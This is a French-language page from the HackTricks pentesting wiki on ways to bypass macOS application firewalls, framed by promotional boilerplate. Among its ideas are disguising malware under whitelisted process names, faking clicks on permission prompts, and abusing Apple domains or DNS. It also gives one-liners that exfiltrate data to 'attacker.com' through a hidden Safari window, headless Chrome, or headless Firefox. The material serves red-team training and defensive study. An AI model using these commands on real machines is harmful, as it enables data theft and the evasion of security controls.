4.7 KiB
Contournement des pare-feu macOS
Apprenez le piratage AWS de zéro à héros avec htARTE (Expert en équipe rouge AWS de HackTricks)!
Autres façons de soutenir HackTricks :
- Si vous souhaitez voir votre entreprise annoncée dans HackTricks ou télécharger HackTricks en PDF, consultez les PLANS D'ABONNEMENT !
- Obtenez le swag officiel PEASS & HackTricks
- Découvrez La famille PEASS, notre collection exclusive de NFTs
- Rejoignez le 💬 groupe Discord ou le groupe Telegram ou suivez moi sur Twitter 🐦 @carlospolopm.
- Partagez vos astuces de piratage en soumettant des PR aux HackTricks et HackTricks Cloud github repos.
Techniques trouvées
Les techniques suivantes ont été trouvées fonctionnant dans certaines applications pare-feu macOS.
Abus des noms de liste blanche
- Par exemple, appeler le logiciel malveillant avec des noms de processus macOS bien connus comme
launchd
Clic synthétique
- Si le pare-feu demande la permission à l'utilisateur, faire en sorte que le logiciel malveillant clique sur Autoriser
Utiliser des binaires signés par Apple
- Comme
curl
, mais aussi d'autres commewhois
Domaines Apple bien connus
Le pare-feu pourrait autoriser les connexions vers des domaines Apple bien connus tels que apple.com
ou icloud.com
. Et iCloud pourrait être utilisé comme un C2.
Contournement générique
Quelques idées pour essayer de contourner les pare-feu
Vérifier le trafic autorisé
Connaître le trafic autorisé vous aidera à identifier les domaines potentiellement en liste blanche ou les applications autorisées à y accéder
lsof -i TCP -sTCP:ESTABLISHED
Abus du DNS
Les résolutions DNS sont effectuées via l'application signée mdnsreponder
qui sera probablement autorisée à contacter les serveurs DNS.
Via les applications du navigateur
- oascript
tell application "Safari"
run
tell application "Finder" to set visible of process "Safari" to false
make new document
set the URL of document 1 to "https://attacker.com?data=data%20to%20exfil
end tell
- Google Chrome
{% code overflow="wrap" %}
"Google Chrome" --crash-dumps-dir=/tmp --headless "https://attacker.com?data=data%20to%20exfil"
{% endcode %}
- Firefox
firefox-bin --headless "https://attacker.com?data=data%20to%20exfil"
- Safari
open -j -a Safari "https://attacker.com?data=data%20to%20exfil"
Via injections de processus
Si vous pouvez injecter du code dans un processus autorisé à se connecter à n'importe quel serveur, vous pourriez contourner les protections du pare-feu :
{% content-ref url="macos-proces-abuse/" %} macos-proces-abuse {% endcontent-ref %}
Références
Apprenez le piratage AWS de zéro à héros avec htARTE (Expert de l'équipe rouge HackTricks AWS)!
Autres façons de soutenir HackTricks :
- Si vous souhaitez voir votre entreprise annoncée dans HackTricks ou télécharger HackTricks en PDF, consultez les PLANS D'ABONNEMENT !
- Obtenez le swag officiel PEASS & HackTricks
- Découvrez La famille PEASS, notre collection exclusive de NFT
- Rejoignez le 💬 groupe Discord ou le groupe Telegram ou suivez moi sur Twitter 🐦 @carlospolopm.
- Partagez vos astuces de piratage en soumettant des PR aux HackTricks et HackTricks Cloud github repos.